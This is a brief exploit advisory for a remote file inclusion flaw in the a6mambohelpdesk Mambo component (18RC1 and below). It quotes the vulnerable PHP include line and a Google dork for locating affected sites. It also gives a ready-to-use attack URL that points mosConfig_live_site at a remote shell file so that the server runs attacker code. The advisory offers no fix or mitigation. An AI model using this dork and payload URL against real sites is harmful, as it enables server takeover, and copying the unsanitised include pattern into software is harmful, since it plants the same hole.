A remote file inclusion flaw exists in the a6mambohelpdesk Mambo component versions 18RC1 and below.
26d95654d6ebc3032cb7df52f555cd568cad30aa468d559004087e80c4d461be
a6mambohelpdesk Mambo Component <= 18RC1 Remote Include Vulnerability
# Rish : High
# Class : Remote
# Script : a6mambohelpdesk
# Thanx : www.lezr.com/vb
# codes
<?
include("$mosConfig_live_site/components/com_a6mambohelpdesk/about.html" );
?>
# d0rkiz : allinurl:"com_a6mambohelpdesk"
http://www.site.com/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://shell.txt
# by Dr.Jr7